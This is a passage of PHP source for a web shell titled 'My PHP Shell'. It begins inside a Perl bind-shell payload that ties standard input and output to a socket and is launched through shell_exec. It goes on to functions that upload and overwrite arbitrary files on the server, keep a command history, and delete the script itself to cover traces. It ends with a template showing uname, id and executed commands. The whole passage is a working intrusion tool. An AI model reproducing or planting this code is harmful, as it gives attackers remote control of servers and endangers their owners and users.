&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system(\$system);
close(STDIN);
close(STDOUT);
close(STDERR);
PERL_BIND_SHELL;
$tmpfile = tempnam('/tmp', '5454');
$fp=fopen($tmpfile,"w");fwrite($fp,$perl_bs);fclose($fp);//writing perl payload to tempfile
$cmd= "perl $tmpfile";
shell_exec($cmd);
execute_simple("rm -f $tmpfile");
}
/**
* Upload a file
*
* @return String errors
* */
function upload(){
if(is_dir($_POST['file_path'])){
if( is_writable( $_POST['file_path'] ) ){
if( !file_exists( $_POST['file_path'] . "/" . $_FILES['file']['name'] ) ){
move_uploaded_file( $_FILES['file']['tmp_name'], $_POST['file_path'] . "/" . $_FILES['file']['name'] );
}else {
return "File allready exists!";
}
}else{
return "You do not have write permissions to this dir";
}
}else{
if(!file_exists($_POST['file_path'])){
if( is_writable( dirname( $_POST['file_path'] ) ) ){
move_uploaded_file( $_FILES['file']['tmp_name'], $_POST['file_path']);
}else{
return "You do not have write permissions to this dir";
}
}else{
return "File allready exists!";
}
}
}
/**
* Getting previous commands buffer
*
* @param Array $buffer
* @return String
* */
function load_buffer(&$buffer){
if(!is_array($buffer)) $buffer = array();
$data = join("\n", $buffer);
$data .= "\n\n";
return $data;
}
/**
* Putting the buffer
*
* @param Array $buffer
* @param Int $buffer_len
* @param String $command
* */
function save_buffer(&$buffer, &$buffer_len, $lines){
if(!is_int($buffer_len)) $buffer_len = 0;
$lines = explode("\n", $lines);
$len = count($lines);
if(($buffer_len + $len) > BUFFER_MAX_LINES){
$drop = $buffer_len + $len - BUFFER_MAX_LINES;
$buffer_len -=$drop;
while($drop--){
array_shift($buffer);
}
}
$buffer_len += $len;
while($len--){
array_push($buffer, array_shift($lines));
}
}
/**
* Unseting the sessiong and destroing the script
*
**/
function destroy(){ //this function deletes the script and clears sessions
$_SESSION = array();
session_destroy();
@unlink($_SERVER['SCRIPT_FILENAME']);
}
/**
* Save edited file
*
*/
function save_file(){
global $error;
$file_path = $_POST['filepath'];
$content = $_POST['content'];
$content = stripslashes($content);
if(!is_dir($file_path)){
if(file_exists($file_path)){
if(is_writable($file_path)){
$fp = fopen($file_path,"w");
fwrite($fp,$content);
fclose($fp);
}else {
$error = "'$file_path' is not writable!";
}
}else{
if(is_writable(dirname($file_path))){
$fp = fopen($file_path,"w");
fwrite($fp,$content);
fclose($fp);
}else{
$error = "$file_path' is not writable!";
}
}
}else {
$error = "'$file_path' is a directory!";
}
}
/**
* Display editor
*/
function display_editor($file){
if(!is_dir($file)){
if(is_readable($file)){
if(is_writable($file)){
$content = file_get_contents($file);
}else {
$error = "'$file' is not writable!";
}
}else {
$error = "'$file' is not readable!";
}
}else {
$error = "'$file' is a directory!";
}
ob_start();
?>
My PHP Shell
}?>
My PHP Shell
}?>
uname -a | {UNAME} |
id | {ID} |
httpd | {SERVER_SIGNATURE} |
date | {DATE} |
pwd | {PWD} |
Executed: {CMD}
$value){
$html_content=str_replace("{".$pattern."}",$value,$html_content); //some template shit...
}
ob_end_clean();
echo $html_content;
}
?>